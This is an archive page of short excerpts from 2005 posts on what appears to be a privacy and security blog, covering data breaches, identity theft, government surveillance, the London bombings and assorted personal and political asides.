So reports the LA Times (Bugmenot) in “Pot ID Card Program Shelved:” California health officials Friday suspended a pilot program that issues photo identification to medical marijuana users out of concern that a recent U.S. Supreme Court ruling could make the state and ID holders targets for federal prosecution.


Small Bits: Government, Government, Government, Bill Scannell and Christopher Hitchens

Kip Esquire has a great roundup in “Linkfest — Special “Hear/See/Speak No Evil” Edition,” guaranteed to boil the blood of anyone who thinks that sometimes government goes too far. Then again, sometimes government doesn’t go far enough. In the case of New York’s MTA, they’ve spent $30m of the $600m they have available for security, […]


"Declaration of Repudiation?"

Dave Belfer-Shevett points to a Declaration Of Repudiation by Will Frank. It starts out pretty well, but then degenerates into complaining about gay rights, abortion, sex ed and Kyoto. Yes, I say degenerates, even if I might agree with some of these, because they’re a distraction. Reagan and Bush Sr. were opposed to abortion rights […]


London, Perspective

At the end of a long, thoughtful post, Thurston writes: One final thought. Four bombings in London are front-page, stop-the-presses news for two days straight. If that was Baghdad, only four bombings would have been a slow day. What message does that send the Third World?


Backup Tapes?

Allan Friedman asks for comments on Lauren Weinstein’s post to Interesting People: (Lauren W) Ironically, it’s true that the probability of lost backup tapes being used opportunistically for ID theft is probably fairly low, at least in comparison to all the “ID theft supermarkets” that are out there — crooked commercial and government employees willing […]


An Israeli Friend in London Writes…

(This entire post is by my friend Shimrit, an Israeli living in London, and is posted with permission.) I felt the need to write down my thoughts about today so I did. Seeing as I have nowhere to publish them, I am sending them round instead. Once again, it seems my terrorist attack luck has […]


On "Bringing To Justice"

First, let me say that the response from not only Blair, but all of London is inspiring. They are refusing to panic after these attacks. The underground is open and running this morning (with some nervousness). At Balkanization, Kim Lane Scheppele makes an interesting point about “Britain’s State of Emergency, and the anti-terror laws in […]


Ping Flood

Over at Usable Security, Ping is blogging about the SOUPS conference, which I’m unfortunately missing. Alan Schiffman is also blogging a little. However, Ping is posting so much that his first posts today have already scrolled off the top of his blog. Who knew he’d invent a new denial of service attack?


"These cruel, wanton, indiscriminate bombings of London…"

My sympathies to the people of London, and all those around the world who are worried about their loved ones in London. Wikipedia has a clear summary of what’s happened, along with this translation from the pigs responsible: We continue to warn the governments of Denmark and Italy and all the crusader governments that they […]


City National Bank, Thousands of Millionaires, Iron Mountain

In the San Francisco Chronicle, David Lazarus reports “Personal data lost — again:” Today I bring news of yet another security breach involving potentially thousands of people’s personal info, and this is the first anyone’s hearing of it. The latest company to drop the data ball is City National Bank, based in Los Angeles and […]


USC Admissions, 320,000 SSNs, SQL Injection

A programming error in the University of Southern California’s online system for accepting applications from prospective students left the personal information of as many as 320,000 users publicly accessible, school officials confirmed on Tuesday. “Sap,” discoverer of the vulnerability in USC’s Web application The flaw could have allowed an attacker to send commands to the […]


Russia's Information Market

Bruce Schneier mysteriously titles a post “Russia’a Black-Market Data Trade.” But it’s not clear to me that this is black-market at all. Does Russia have a data protection law? Quoting from The Globe and Mail: At the Gorbushka kiosk, sales are so brisk that the vendor excuses himself to help other customers while the foreigner […]


What Is Terrorism?

A quirk in how the U.S. government defined terrorism meant that when Chechen rebels blew up two airliners almost simultaneously over Russia last year, only one was counted in an annual tally of terrorist attacks. On board one plane were 46 Russians. But the other had 43 Russians and an Israeli citizen — a foreign […]


Choicepoint Roundup

At MSNBC, Bob Sullivan covers the loss of confidence in ecommerce that leaks are causing: The survey also found nearly all Americans think identity theft and spyware are serious problems, but only 28 percent think the government is doing enough to address the issues. About 70 percent said new laws are necessary to protect consumer […]


"The Great Equalizer"

Pittsburgh Mayor Tom Murphy tells the Post Gazette that “Eminent domain ‘is a great equalizer when you’re having a conversation with people…’” Indeed it is. Pictured is another “great equalizer.” (Quote via John Tierney in “Your Land Is My Land,” in the New York Times.)


Two Minutes Hate in the Blogosphere

Fred, who did graphic design for RECon, is doing a comic book of 1984. (The copyright on 1984 has expired in Canada.) He also had great “Big Brother is Watching You” posters, one of which I bought. Fred (pictured, left) was also good enough to introduce my talk, and provide a hanging banner. You can […]


Small Segments Stolen From Some People Surnamed "S"

The first two are from Scrivener, because he’s going on vacation, they’re good, and I’m shameless. “Iraq Swede vows to catch kidnappers,” reports The Local: A Swede held hostage in Iraq for 67 days and released a month ago has vowed to take revenge on his captors and has hired bounty hunters to capture them, […]


The unanimous Declaration of the thirteen united States of America

The Declaration of Independence of the Thirteen Colonies In CONGRESS, July 4, 1776 The unanimous Declaration of the thirteen united States of America, When in the Course of human events, it becomes necessary for one people to dissolve the political bands which have connected them with another, and to assume among the powers of the […]


Deep Impact

We’re about 4 hours from Deep Impact making a large hole in Comet Tempel 1. The National Business Review in New Zealand has an excellent links roundup in “Comet impact: See it online.”


Why I Read Blogs

In a post titled “Why Blog, Anyway,” Mark makes a really good point: And what about the audience? Readers who don’t blog may not be aware of how much bloggers want readers. Part (I suspect a very big part for most) of it’s an ego thing, like people on soapboxes at the town square with […]


Small Bits: Adam Sah on Startups, RECon, Irony and Biometrics

Adam Sah (hi Adam!) has a great page of startup advice I hadn’t seen before. Presentations from RECon are now online. The University of Connecticut will be offering a Masters in Homeland Security. That’s a database I’d like to steal. Thanks to Chris Walsh for pointing it out. I’ve been meaning to follow up on Juxtaposition’s […]


Well Said!

“IRS announces plans to be the butt of three consecutive days of “Daily Show” jokes.” So headlines John Paczkowski’s post at Good Morning Silicon Valley.


Doing the Devil's Work

The Internet, with its freedom of communication, scares a lot of people. Some people argue that this is “just political,” but it’s not. Chinese repression includes information about health issues, such as the abuse of antibiotics to control avian flu. (See, for example, “Bird Flu Drug Rendered Useless” in the Washington Post.) The companies that […]


Choicepoint Roundup, June 30

We open with two articles from News.com: “ChoicePoint overhaul falls behind,” (June 24) and “ChoicePoint overhaul completed, company says” (June 30). From the latter: “In fact, we’ve gone beyond our announced commitments to make substantial changes in the past 90 days,” ChoicePoint spokesman Dan McGinn said in an e-mail late Tuesday. The Alpharetta, Ga.-based data […]


Chase Manhattan and Textual Interpretation

Ray Everett Church picks up on a story, “Shouldn’t The CardSystems Victims Be Notified?” from Ed Foster, showing that Chase Manhattan bank has failed to read the text of California’s SB 1386. Ed writes: “Even the strictest of laws, like the one in California, require more identifying information like the individual’s social security number or […]


Cardsystems Auditor

I can’t find the blog that discussed the irony of a Visa spokesperson claiming that PCI worked because of the auditor’s need to put their reputation on the line, but then refused to name the auditor. According to the New York Times, in “Weakness in the Data Chain,” it was Cable and Wireless: In December […]


The Funeral of an American Soldier

I don’t care what you think of the conduct of a war. What you think of the reasons we’re involved in that war. The funeral of a soldier is no place for political protest, except, perhaps, maybe, if that soldier is a direct family member. The behavior of a dozen assholes from Kansas at the […]


Iran's New President a "Moderate"

“After all, he didn’t kill his hostages…” London, Jun. 29 – Iran Focus has learnt that the photograph of Iran’s newly-elected president, Mahmoud Ahmadinejad, holding the arm of a blindfolded American hostage on the premises of the United States embassy in Tehran was taken by an Associated Press photographer in November 1979. Prior to the […]


The FTC and BJs Wholesale

The FTC has recently issued a consent order to BJ’s Wholesale club in response to this complaint. The FTC, unfortunately, is the body charged with protecting consumers from ID theft. They are failing to rise to the challenge. This is obvious from the continued growth of ID theft. It is obvious from FTC Chair Deborah […]


Equifax CEO: ID Theft is an epidemic

But [Equifax CEO] Chapman acknowledges Equifax has “no silver bullet” when it comes to thwarting fraud. One popular belief is that checking a credit report once a year is a defense. That doesn’t protect consumers, Chapman said. “It’s not going to help and the public is starting to learn that,” Chapman said. He decried the […]


Fingerprint Privacy

There have been a slew of stories lately about fingerprint readers being tied into payment mechanisms. I don’t particularly like the idea, but if you do, feel free. At least until your lack of care about privacy starts displaying externalities. Many of these vendors are making claims like it is not possible to recreate the […]


UK ID Cards, Choicepoint, and Privacy

Usually, government ministers wait until a new program has been rolled out before they start reneging on their promises of how it will work. But in the brave new world of UK ID cards, they’re being honest. As the Independent reports in “Ministers plan to sell your ID card details to raise cash”: Personal details […]


A Privacy-Openness Tradeoff

In “Adoptees File Human Rights Complaint Against Canadian Privacy Commissioner,” Privacy.org reports on a dispute between the parents and children, mediated by the state: A group of Ontario adoptees has filed a human rights complaint against Privacy Commissioner Ann Cavoukian after she lobbied the province to amend its proposed adoption disclosure law with a clause […]


Choicepoint, Two Minutes Hate

This was going to be a roundup, but heck, there’s a backlog of hate, and I must post. Under the headline, “Who let Jeb Bush and ChoicePoint into the UK?” ‘Brother Rail Gun of Desirable Mindfulness’ points to a BBC story, “Hundreds wiped off vote register.” An oldie-but-I-hadn’t-linked, Adrift at Sea comments in “Bleeding Edge […]


U Connecticut, 72,000 SSNs, Hacker

A computer containing personal information such as Social Security number and name was breached by an unauthorized intruder. Although there is no evidence indicating that this personal data was accessed or extracted, the University of Connecticut is contacting everyone whose identity may have been put at risk. … The breach occurred on October 26, 2003. […]


TSA Lies, Could Face Time Fines

Homeland Security officials who defied Congress and misled the public by creating secret files on American citizens while testing a new passenger screening program may have engaged in multiple counts of criminal conduct, and at least one employee has already lied to cover-up the misdeed. Read “TSA Lies, Could Face Fines” at Secondary Screening. Pictured […]


FinCen (IRS), Potentially tens of thousands, Complacent Bureaucrats

The U.S. tax agency — whose databases include suspicious activity reports from banks about possible terrorist or criminal transactions — launched the probe after the Government Accountability Office said in April that the IRS “routinely permitted excessive access” to the computer files. The GAO team was able to tap into the data without authorization, and […]


CVE Content Decisions

The fine folks at MITRE have published “CVE Abstraction Content Decisions: Rationale and Application:” This document is intended for use by Candidate Numbering Authorities (CNAs) and may be of interest to vulnerability researchers, maintainers of vulnerability databases and other CVE-compatible products and services, and technical consumers of vulnerability information on a large scale. Via OSVDB Blog, […]


Two There Are Always (Plus a Freebie)

Gizmodo asks “Am I the only one extremely disappointed by the fact that these upcoming Lucas-approved USB keys don’t offer a Han model?” No, you’re not. I’d get me Han in Carbonite to protect my data any day. I bet Wil Shipley would too. Anyone who can explain why Anakin went to the dark side […]


Dear Gmail

Thank you so much for your recent letter, telling me that We’ve noticed that you haven’t used your Gmail account, account.management@gmail.com, for quite some time. In order to make Gmail better for our users, we’ve added a lot of things in the last few months and we hope you’ll want to start using your account […]


Identity Thieves Drain Unemployment

But the most underpublicized identity theft crime is one in which thieves defraud state governments of payroll taxes by filing fraudulent unemployment claims. It can be a fairly lucrative scheme, too. File a false unemployment claim and you can receive $400 per week for 26 weeks. Do it for 100 Social Security numbers and you’ve […]


Suntrust, 75? SSNs, Employee Jonathan Bryan Adair

This post updated to replace the Suntrust logo with “You can’t shut me up” by Jennifer Moo, after a bunch of bozos called “Internet Identity” sent vaguely scary letters that chilled my web hosting company. The Atlanta Journal Constitution reports that “Ex-SunTrust employee charged in check scam.” (Use Bugmenot for a login.): The U.S. attorney’s […]


Equifax Canada, 600 credit histories, hacker

CBC is reporting “Hacker accesses files at Equifax:” A computer hacker has accessed the files of about 600 consumers at Equifax Canada, one of Canada’s major credit bureaus. Most of the files are for consumers from British Columbia. Better Business Bureau spokesperson Sheila Chernesky said personal financial information is being gathered all the time, and […]


Florida Hospitals, "40 pages" of medical histories, mis-dialed fax

ALTAMONTE SPRINGS, Fla. — The private medical information for hundreds of people ended up at a Seminole County airplane parts business. The information was about patients at Florida Hospital East and Florida Hospital Altamonte. It included hundreds of names, birth dates, social security numbers and medical diagnosis information. … The 40-page fax included appointment information […]


Stupid Privacy Invasion Fatigue

This morning, Liz sent me a pointer to “Pentagon Creating Student Database” in the Washington Post. I said “Not blogging it. I have stupid privacy invasion fatigue.” Apparently, I’m not alone. In “ID theft concerns grow, tools lacking,” Bob Sullivan of MSNBC reports: Among the report’s most interesting findings: only 14 percent of consumers who […]


China's Internet Blocking and Ethics

Rebecca MacKinnon has a post about US companies which are selling internet censorship technologies to China, “Confirmed: All Typepad blogs blocked in China:” It’s a complicated issue. We need greater scrutiny of U.S. tech companies in China by bloggers, journalists, human rights activists, and anybody who cares about free speech and corporate accountability. We need […]


Uncle Sam's Privacy Policies (TSA, SSA)

Daniel Solove has posts on “If It’s Against Your Privacy Policy, Just Change It” (Social Security Administration): This feeds distrust about the government’s law enforcement activities as well as makes people unsure that they are ever being given the complete story about what the government is doing with their personal data. And what good is […]


Trial By Fire

Tom Ptacek and Jeremy Rauch are offering a course on analyzing products, taking them from black boxes to open books. Cool! From the ad: This class offers a behind-the-scenes tour of the product evaluation process. Renowned security experts Jeremy Rauch and Thomas Ptacek offer a crash course on the most important aspects of validating – […]


Kaiser Permanente, 150 patients, $200,000 fine

Computerworld reports that “Kaiser Permanente division fined $200k for patient data breach:” The California Department of Managed Health Care (DMHC) has fined Kaiser Foundation Health Plan, a division of Kaiser Permanente, $200,000 for exposing the confidential health information of about 150 people. The DMHC said the information had been available on a publicly accessible Web […]


"Dear Mastercard,"

Effective May 1, 2005, any compromise of my data will result in a $50 liability for you, the card issuer, owed to me, the card holder. Cashing the payment check I sent you last month (which you did) shall constitute your acceptance of this agreement. Subsequent security breaches will compound the fee. I will spell […]


Small Bits of Privacy

CSO has a “Do it Yourself Disclosure.” Hey, you skimped on security, you might as well skimp on the PR. Wired News comes out in favor of a data protection and privacy law for the US in “Congress Must Deal with ID Theft.” The Financial Times has an article on [UK] “Regulator urges tougher laws […]


CardSystems and Choicepoint

Choicepoint, please call your trademark attorneys. You’re in danger of becoming a generic term for “massive security breach,” and a band-aid isn’t going to fix that. That was the lead (and about all I’d written) of a long post on Choicepoint and some bank breach. I think it was the New Jersey case. The point […]


CardSystems Cards Being Exploited

The Denver Channel reports that “Stolen Credit Card Data Now Being Sold On Internet:” CardSystems Solutions Inc. is admitting it made a huge mistake after some 40 million credit card accounts ended up in the wrong hands. Some of those account numbers are already being sold on a Russian Web site, and some consumers are […]


FDIC, 6,000 employee SSNs, "security failure"

Thousands of current and former employees at the Federal Deposit Insurance Corp. are being warned that their sensitive personal information was breached, leading to an unspecified number of fraud cases. In letters dated last Friday, the agency told roughly 6,000 people to be “vigilant over the next 12 to 24 months” in monitoring their financial […]


Why I Blog

Inspired in part by Daniel Solove’s “How Blogging Changed My Life,” in part by a number of emails I’ve just sent saying “Sorry, I’ve been heads down with product release,” and the contrasting reality that I’ve found energy to write twelve blog posts in that time, I thought I’d talk about the muses. I started […]


Spaceman Bicycle Flask Holster

Because no one’s ever said “Is that a hip flask in your bike shorts, or are you happy to see me?” Available from Aherne Cycles.


CardSystem Solutions, 40,000,000 CC, hacker

The New York Times (and probably everyone else) is reporting that “MasterCard Says 40 Million Files Are Put at Risk.” MasterCard said its investigation found that CardSystems, in violation of MasterCard’s rules, was storing cardholders’ account numbers and security codes on its computer systems. That information, MasterCard said, was supposed to be transferred to the […]


Thanks, but…

The Open Mind kindly writes: Adam Shostack who is in the computer security side of business always has informed and interesting news on the security vs privacy front. (Another great blog via Harry’s world of interesting links. ) If you read anything vaguely connected to security or privacy in the mainstream media, Adam has probably […]


More on North Korean Online Warfare

I wrote about this in “North Korean Hacking Story,” and more detail emerges from a mail (or perhaps it’s a website? Hard to tell.) that was eventually forwarded to Dave Farber’s IP list. Brooks Isoldi, editor of Intellnet, writes: North Korea has trained a small army of computer hackers whose capability is equal […]


Minnesota, 2,000 medical records, hacker

The Duluth News Tribune is carrying a story, “State’s Web systems bogged down:” [Monicq] Feider, [manager of the Health Professionals Services Program] disclosed the problem in a March 31 letter sent to nearly 2,000 health professionals. “The case management system database includes private and public information about you,” she wrote. “The security company believes that […]


On Real ID, and Hearings

Privacy Law has a post, “Senate to Hold Security Breach and ID Theft Hearings” about a June 16 2005, Senate Committee on Commerce, Science and Transportation hearing on identity theft. The DailyBulletin editorializes against the Real ID act, “


Motorola, 34,000 Employee SSNs, Outsourcer ACS

In an article titled “Stolen PCs contain Motorola HR data“, Reuters is reporting that: In the latest example of hardware theft putting data security at risk, two computers containing personal information on Motorola employees were stolen from the mobile phone maker’s human resources services provider, Affiliated Computer Services (ACS). The data on the stolen computers […]


Star Wars Posts

Lileks bleats: When you switch to the Dark Side, do you have to go to Sith HR to fill a bunch of forms? If the Jedi Council finds out you’re looking to switch sides, they send guards to make you empty out your desk and escort you out – or at least they used to. […]


More Terrorist Slander Against Heroic Prison Guards

Except this time, the “terrorists” are American veterans working for a private company in Iraq: “I never in my career have treated anybody so inhumane,” one of the contractors, Rick Blanchard, a former Florida state trooper, wrote in an email quoted in the Los Angeles Times. “They treated us like insurgents, roughed us up, took […]


Small Bits: Soviet Realism at DHS and in China, Going Public, Lameness, and Curves

Artiloop reports on a security poster on the Marc commuter trains. It’s clearly the work of a thoughtcriminal, encouraging ironic responses. I want to heroically help plan the tractor factory. I’ve been meaning to discuss the Chinese blog crackdown, but instead I’ll just juxtapose it with Soviet Realism. The Supreme Court of Canada has ruled […]


Emerging From Chaos

The server that Emergent Chaos lives on is at Server Beach, who have had serious problems with power. If you saw the Most Significant Bit home page, that’s Dwight Ernest, who kindly provides the space for me. Thanks Dwight!


The Open Society Paradox: Companies Have Privacy, You Don't

For those who, during the ChoicePoint outcry, (see Secondary Screening) were critical of me for not supporting a notification law for companies who maintain databases of personal information I point you to a couple of facts. First, today’s news that tapes with the sensitive data of 4 million Americans are missing is just the latest […]


ACM Computer & Communications Security

Industry and Government Track of CCS ’05 is now accepting submissions: The track aims to foster tighter interplay between the demands of real-world security systems and the efforts of the research community. Audience members would like to learn about pressing security vulnerabilities and deficiencies in existing products and Internet-facing systems, and how these should motivate […]


Telang and Wattal on Insecurity and Stock Price

At the Workshop on Information Security Economics, Rahul Telang and Sunil Wattal presented “Impact of Software Vulnerability Announcements on the Market Value of Software Vendors – an Empirical Investigation.” I’m pretty busy, so I’ll point to comments by Ed Moyle, and hefty analysis by Tom Ptacek. [Private to DM: If I say it’s a workship, […]

 

"Well, umm, He Had Valid ID"

AP is reporting “Man With Chain Saw, Sword Is Let Into U.S.:” On April 25, Gregory Despres arrived at the U.S.-Canadian border crossing at Calais, Maine, carrying a homemade sword, a hatchet, a knife, brass knuckles and a chain saw stained with what appeared to be blood. U.S. customs agents confiscated the weapons and fingerprinted […]

 

Markets in Social Security Numbers

Social security numbers used to be just for social security. But the government is the only actor in the marketplace who can produce something, and also mandate demand for it. In the case of SSNs, they’ve created a large demand by declaring that Uncle Sam gets to decide who you may hire. (The gossip-mongers credit […]

 

Terminal Futility

I think I had also noticed that there are not enough plastic bins or tables to line them up on, and that “X-ray machines that examine carry-on baggage sit idle as much as 30 per cent of the time.” The time elapsed between Sept. 11, 2001, and today’s writing (1,364 days) is only slightly less […]

 

Madison, The Bill of Rights, Raich

The Supreme Court today handed down a decision in “Gonzales vs. Raich.” Larry Solum has done outstanding work blogging it. The essence of the case was the limits of the commerce clause, and the case was decided that the commerce clause places, essentially, no limits on what Congress may legislate. Respondents nonetheless insist that the […]

 

Citibank, 3,900,000 SSNs, unencrypted tape

[Update: Bruce Schneier has an important update in “E-Hijacking.” Thanks to Chris for pointing this out.] CNN is reporting that Info on 3.9M Citigroup customers lost. Citigroup said Monday that personal information on 3.9 million consumer lending customers of its CitiFinancial subsidiary was lost by UPS while in transit to a credit bureau — the […]

 

Polk Community College, 3 SSNs, Professor Bradley Neil Slosberg

Professor Bradley Neil Slosberg asked students in his anatomy and physiology class to sign in with their name and social security numbers. They did. CNN quotes student Amanda Bracewell: “We all signed it. We figured, ‘He’s a teacher, what is he going to do with it?’” TBO.com news has the only non-AP story, at Professor […]

 

New Law Protects You, Shredder Makers

At MSNBC, Bob Sullivan reports “Got a nanny? You need a shredder:” Even if you ordered a background check on your kid’s coach, or nanny, or — as is the latest trend in online dating — on a prospective blind date, the law applies to you. Transgressions — such as tossing paperwork containing personal information […]

 

Cakeeater on Tiananmen

CakeEater has a beautiful post on the man in front of the tanks: Then the tank tried to get around him. And he moved in concert with it, shifting to stay directly in its path. I remember being stunned when this happened. I remember saying, “Holy Shit!” to no one in particular in the family […]

 

Duke, 9,000 partial SSNs, Hacker. (With Commentary.)

In Hacker hits Duke system, the (Charlotte? Raleigh [thanks, Neil!]) News and Observer reports on a breach at Duke University School of Medicine. The school’s “Security Incident at Duke” page states: On Thursday, May 26, 2005 a security breach allowed an unauthorized user to gain access to data stored on several web sites at Duke […]

 

Moxie CrimeFighter Jillette

It's all over the web that Penn Jillette and his wife Emily have named their new baby Moxie CrimeFighter. I’m sorta disappointed that they didn’t go all the way, and name her “Moxie CrimeFighter™ Jillette, a member of the Jillette family of people.”

 

Breach Laws

The Washington Post reports: States Keep Watchful Eye on Personal-Data Firms: Critics of the multi-state approach say that due to the potential monetary, logistical and public-relations headaches that could come from establishing different requirements and penalties in each state, companies will soon be forced to set their overall policies to satisfy the state with the […]

 

The Voting-Industrial Complex

The fine folks over at Black Box Voting demonstrate that Diebold can’t even build an optical scan voting machine without screwing it up in “Optical scan system hacked (3 ways).” If we existed in a reality-driven world, these people would be permanently disqualified from participating in the vote counting process. Vote counting is, as Stalin […]

 

June 4th, 1989

At our best, the United States inspires people around the world to reach for freedom and democracy. In the student-led rallies in Tiananmen Square, the students built a statue of liberty as one of the centerpieces of their protest. I remember watching the protests on TV, being thrilled by the power of people to […]

 

North Korean Hacking Story

The Korea Herald has done an awful job of reporting in “N.K. hacking ability matches that of CIA, analyst says.” Normally, I ignore awful reporting as roughly par for the course, but this is egregious. “Our electronic warfare simulation indicates that North Korea’s capability has reached a substantial level, unlike what is generally known to […]

 

Small Bits: Wives Vs. The Dark Side, Diamonds, FRCA, Brill & Lexis-Nexis

VikingZen posts her Two Cents about Revenge of The Sith, and closes with: My big question: Why didn’t Padme just release a can of whoop-ass on her husband? I mean, they’re secretly married, the guy’s off in some outer galaxy playing space cowboy while she’s lugging around a pregnant belly full of twins? How about […]

 

More on Deep Throat

The Telegraph has a roundup story, “FBI Deep Throat branded a traitor by Nixon aides:” Charles Colson, Nixon’s chief counsel who served seven months in jail for his role in the Watergate scandal, confessed to understanding the dilemma Mr Felt faced. But he added: “When any president has to worry whether the deputy director of […]

 

University of Cincinnati, 7,000 SSN, Hacker

Cincinnati’s Channel Cincinnati reports that “Hacker Steals Personal Data From UC System:” UC Vice President of Information Technology, Fred Siff, said the hacker knew how to avoid intruder alerts on the system. “This was obviously a serious breach,” Siff said. “This is a very sophisticated hack. I hope that goes without question. It wasn’t just […]

 

Omega World Travel, 80,000 CCs, Laptop

The Washington Post reports, “FBI Probes Theft of Justice Dept. Data” The FBI is investigating the theft of a laptop computer containing travel account information for as many as 80,000 Justice Department employees, but it is unclear how much personal data are at risk of falling into the wrong hands. Authorities think the computer was […]

 

SEC on Internal Controls

Pete Spire Lindstrom* points to a press release from the SEC on “Commission Statement on Implementation of Internal Control Reporting Requirements:” “Registered public accounting firms should recognize that there is a zone of reasonable conduct by companies that should be recognized as acceptable in the implementation of Section 404.” “A one-size fits all, bottom-up, check-the-box […]

 

Reporters without…Mathematics

DM pointed me to this Register story, “Fraud expert becomes victim of credit card crime.” It's a nice bit of irony, but my favorite bit is the very end: CNP (Cardholder Not Present) fraud in the UK has grown nearly 50 times between 1994 and 2003 to £116.4 million. Goodwill wants the government to recognise […]

 

W. Mark Felt aka Deep Throat

For more than 30 years, W. Mark Felt and three co-conspirators have protected his privacy after one of the most spectacular whistleblowing acts in history. He’s admitted to being Deep Throat in this Vanity Fair article. The Washington Post has coverage in “FBI’s No. 2 Was ‘Deep Throat’“, and “Conflicted and Mum For Decades.” I’ve […]

 

Breach Disclosure Laws

The National Conference of State Legislatures has a “2005 Breach of Information Legislation” summary page: Summary: Legislation was introduced in at least 34 states as of May 18, 2005. Legislation enacted in at least six states in 2005: Arkansas, Georgia, Indiana, Montana, North Dakota and Washington. Thank you, masked man Choicepoint. (Via The HIPAA blog.)

 

Bluetooth vs Infrared

John Early has an interesting editorial over at Computer Weekly “Infrared meets speed and security needs:” Famously associated with applications such as personal digital assistant to laptop synchronisation, PDA business card exchange and short-haul mobile phone data transfer; IRDA, with its short range and relatively low 4mbps throughput, was understandably discounted by the IT community […]

 

Choicepoint Roundup

Household Watch has a story: When Ms. Marshall got a $6,000 home-improvement loan from a credit union in April 2003, she had to pay relatively high interest because of a weak credit score. The credit check had showed a court ruling ordering her to pay overdue rent to a former landlord in a Washington, D.C., […]

 

Choicepoint vs CIA

The New York Times has a long article on the successors to Air America, “C.I.A. Expanding Terror Battle Under Guise of Charter Flights.” The bit that really caught my attention was: On closer examination, however, it becomes clear that those companies appear to have no premises, only post office boxes or addresses in care of […]

 

The FBI Goes Undercover

The New York Times is reporting on a number of undercover investigations that have led to charges against people accused of helping or trying to help terrorists, in “Trying to Thwart Possible Terrorists Quickly, F.B.I. Agents Are Often Playing Them.” The use of undercover agents is an excellent move by the FBI, and should be […]

 

Privacy and Courage

I met Hossein Derakhshan at Blognashville. He and I respectfully disagree about the value of privacy to bloggers in oppressive regimes. He points out (correctly) that a blogger who has the courage to use his or her own name gains credibility. While I don’t disagree, I think there are people out there who don’t blog […]

 

Speaking of Usability: Privacy and Openness

Jon Mills, who has been heading up Florida’s Committee on Privacy and Court Records, has an article in the HeraldTribune: How do we balance the competing values of privacy and openness? The Internet makes possible greater openness, so indispensable to good government, and allows for greater convenience in accessing government services, including court records. […]

 

Usability Testing

Nat Friedman has a good post on usability testing: Over the last several months we at Novell have sent a team of people around the world with a portable usability testing lab… It is amazing to watch the ways that people fall on their face. We’ve all read about the benefits of usability testing, but […]

 

"Non"

The French have apparently rejected the EU Constitution. With 83% of the votes counted, it’s 57% Non, according to ABC news. The draft constitution was, from my perspective, the worst of the new Europe: Opaque, complex and undemocratic. We can hope that new blood in the EU will press for a simpler, more transparent, and […]

 

French Elections

You might not know it if you read only the American press, but the French voted today in a referendum on the European Union’s proposed Constitution. It’s an awful document, and the French are expected to reject it, plunging the EU into crisis, and leading to the Chancellor being made Emperor. If the EU would […]

 

Social Security

I try to stay out of debates that have devolved into the red and blue halves of the Demopublican party screaming soundbites at each other. The party hopes that the American people won’t notice that they’re the same if they yell and scream a lot, and I try not to play their game. C. Eugene […]

 

Only Two Cheers for the Jedi?

Bryan Caplan takes issue with his mentor, Tyler Cowen over “The public choice economics of Star Wars: A Straussian reading. (I also commented on that post). Caplan says: After Anakin’s betrayal, the remnant of surviving Jedi reveal their “secret and mysterious ends.” They turn out to be neither secret nor mysterious. Yoda and Obi-wan take […]

 

My Navel, it is Fascinating!

I’ve played with the stylesheet for the web version of the blog, added an individual-i logo, removed the calendar and put the search bits in what seems like a more rational order. Some other general tweaks, too, in the hopes of making the web version aesthetically pleasing. I knew you’d be thrilled. [Update: fixed link. […]

 

Sport Utility Bike?

[The] Freeradical S.U.B conversion kit … makes your favorite ride into the baddest sport utility bike on the planet. Forget panniers and racks on the front, or over the back tire that bump your knees and feet. Rather than relying on the strength of a single peg or gimbal on a bike trailer, the Freeradical […]

 

Small Bits: Xrays, Free Speech, Law, Cowards and Crypto School

Justin Mason has a good post on the new backscatter radiation xray machines that TSA would like to deploy. My favorite part: They create child pornography. Interestingly, these are one of the relatively few places that a privacy invasion makes us safer. Also interesting is that different people perceive either the hand-pat or the naked […]

 

Purdue University, 11,360 SSNs, hacker

Purdue University is alerting current and former employees that their Social Security numbers and other information may have been illegally accessed from at least one of four campus computer workstations. “Our investigation of a recent information technology security breach shows that the records of 11,360 current and former employees may have been accessed electronically,” said […]

 

University of Chicago, 24,000+ SSNs, Unsecured File server

The action is motivated by the discovery by a campus web developer that files containing social security numbers were located on a portion of a public server that could be accessed by web developers not associated with the site. He had pointed this out last November, at which time all of the several dozen files […]

 

Those Who Forget History

Some folks calling themselves “American Rhetoric” have put up a page entitled “Top 100 Speeches.” On further examination of the site, it’s the 100 most significant American political speeches of the 20th century, according to a list compiled by Professors Stephen E. Lucas and Martin J. Medhurst. Dr. Lucas is Evjue-Bascom Professor in the Humanities […]

 

MoneyBall

Over at “Statistical Modelling,” Sam discusses “Sabermetricians vs. Gut-metricians:” There’s a little debate going on in baseball right now about whether decisions should be made using statistics (a sabermetrician is a person who studies baseball statistics) or instincts. Two books are widely considered illustrative of the two sides of the debate. Moneyball, by Michael Lewis, […]

 

Small Bits of Chaos: Continuity, Texas, Stealth Bomber

Todd Seavey has a well-written and entertaining long article on continuity in long series. I’ll leave the continuity error as an exercise for readers. In fact, so many necessary plot details of Episode III are already known that the ticket-selling site Moviefone.com already has a lengthy summary of the film on its site, as if […]

 

Small Bits of Chaos: Hal Stern, Lexis-Nexis Hackers, UK ID Cards, Bolton

Hal Stern has a blog! Hi, Hal! Wired News has a long story, “Database Hackers Reveal Tactics,” about the kids who broke into Lexis-Nexis. There’s some interesting bits. Most interesting to me is that none of these kids seem to have lawyers telling them to shut up. The BBC has an article on British reactions […]

 

Valdosta State University (Georgia), 40,000 SSNs, hacker

The Associated Press reports “Identity theft risk widens at Valdosta State:” VALDOSTA — A computer identity breach at Valdosta State University has widened, with authorities now saying up to 40,000 people could have had their Social Security numbers accessed by a computer hacker last week. The breach was larger than originally thought, said school spokesman […]

 

676,000 Victims

I first covered the improper disclosures by Wachovia, Bank of America, Commerce Bancorp, and PNC Bank NA employees last week. It’s now up to 676,000 accounts, all New Jersey residents. The Census Bureau estimates that in 2003, New Jersey had 8,638,396 residents. Thus, around 8% of the people of New Jersey are affected by Orazio […]

 

Stanford, 9,900 SSNs, Insecure Career Center computer

The San Jose Mercury News reports that “Computer system hacked at Stanford:” The FBI and Stanford University are investigating how someone hacked into a computer system containing information about people looking for work through the university’s Career Development Center. University spokesman Jack Hubbard said there was no evidence that any data had actually been acquired […]

 

Don't Be So Proud Of This Technological Terror You've Created

The New York Times reports on the “Customs-Trade Partnership Against Terrorism” in “U.S. Effort to Secure Foreign Ports Is Faulted:” The Department of Homeland Security’s effort to extend its antiterrorism campaign overseas by enlisting help from importers and foreign ports has been so flawed that the program may have made it easier at times to […]

 

Global Internet Freedom Act in House

